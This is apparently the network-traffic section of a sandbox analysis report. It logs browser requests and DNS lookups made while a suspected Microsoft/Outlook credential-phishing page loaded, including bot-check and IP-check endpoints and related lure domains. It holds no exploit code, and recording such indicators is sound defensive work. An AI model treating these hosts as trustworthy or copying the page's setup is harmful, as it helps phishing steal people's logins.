Source: global trafficHTTP traffic detected: GET /microsoft.jpg HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-20efd41c90b5bcbd.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/fd9d1056-6c5a8f8591424bc5.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/23-5e92960ee97bfa6f.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-app-6e9565c54018939e.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/92-1f56c09006754f8e.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/app/page-c97a01c11dd2213c.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/app/not-found-00e5a2a077bf796c.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /microsoft.jpg HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-20efd41c90b5bcbd.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-app-6e9565c54018939e.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/app/not-found-00e5a2a077bf796c.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/app/page-c97a01c11dd2213c.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/fd9d1056-6c5a8f8591424bc5.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/23-5e92960ee97bfa6f.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/92-1f56c09006754f8e.js HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://coxuongkhopbariavungtau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/config/ HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /V5lSkRYhzcE91zkPxxAW4g/550dcf19-a5a9-4ea6-1c7a-34bb54683400/public HTTP/1.1Host: imagedelivery.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://coxuongkhopbariavungtau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /outlook.png HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /V5lSkRYhzcE91zkPxxAW4g/550dcf19-a5a9-4ea6-1c7a-34bb54683400/public HTTP/1.1Host: imagedelivery.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /outlook.png HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nwgwm/0x4AAAAAAA-u8M1sVllAhCoK/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://coxuongkhopbariavungtau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91b2a5edeb89c5e7&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nwgwm/0x4AAAAAAA-u8M1sVllAhCoK/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nwgwm/0x4AAAAAAA-u8M1sVllAhCoK/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/check-bot/ HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/check-ip/ HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: hiiudvt8z.awbpartners.com.au
Source: global trafficDNS traffic detected: DNS query: secureonlineauthenticate.awbpartners.com.au
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: logos-world.net
Source: global trafficDNS traffic detected: DNS query: img.icons8.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: security-us.m.mimecastprotect.com
Source: global trafficDNS traffic detected: DNS query: coxuongkhopbariavungtau.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: imagedelivery.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1194248761:1741101415:ebAz2A4--oCO2_y5RRsSgSZ_3LX5C-f-SQuFHdUY3Ts/91b2a5278a73180d/MqrbWiH.p_CbOALfUC5fkwv9p0dZIVKvOtCGQcp9Pxc-1741104641-1.1.1.1-HWEgMJViHtBSJ3fKx2t4zEuOTwm2.HpAiJJ7gCLiNhkmaoiEpmXRcOFNF4J_XayG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3539sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-Type: text/plain;charset=UTF-8cf-chl: MqrbWiH.p_CbOALfUC5fkwv9p0dZIVKvOtCGQcp9Pxc-1741104641-1.1.1.1-HWEgMJViHtBSJ3fKx2t4zEuOTwm2.HpAiJJ7gCLiNhkmaoiEpmXRcOFNF4J_XayGcf-chl-ra: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hquoi/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
